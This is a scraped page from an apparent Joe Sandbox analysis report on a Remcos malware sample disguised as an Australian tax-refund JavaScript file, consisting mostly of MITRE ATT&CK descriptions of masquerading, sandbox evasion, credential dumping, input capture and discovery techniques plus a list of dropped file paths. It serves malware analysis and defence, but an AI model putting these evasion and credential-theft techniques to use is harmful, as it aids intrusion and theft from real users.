Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Tax_Refund_Claim_2024_Australian_Taxation_Office.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\smudgy.js

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Windows Analysis Report
Tax_Refund_Claim_2024_Australian_Taxation_Office.js

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre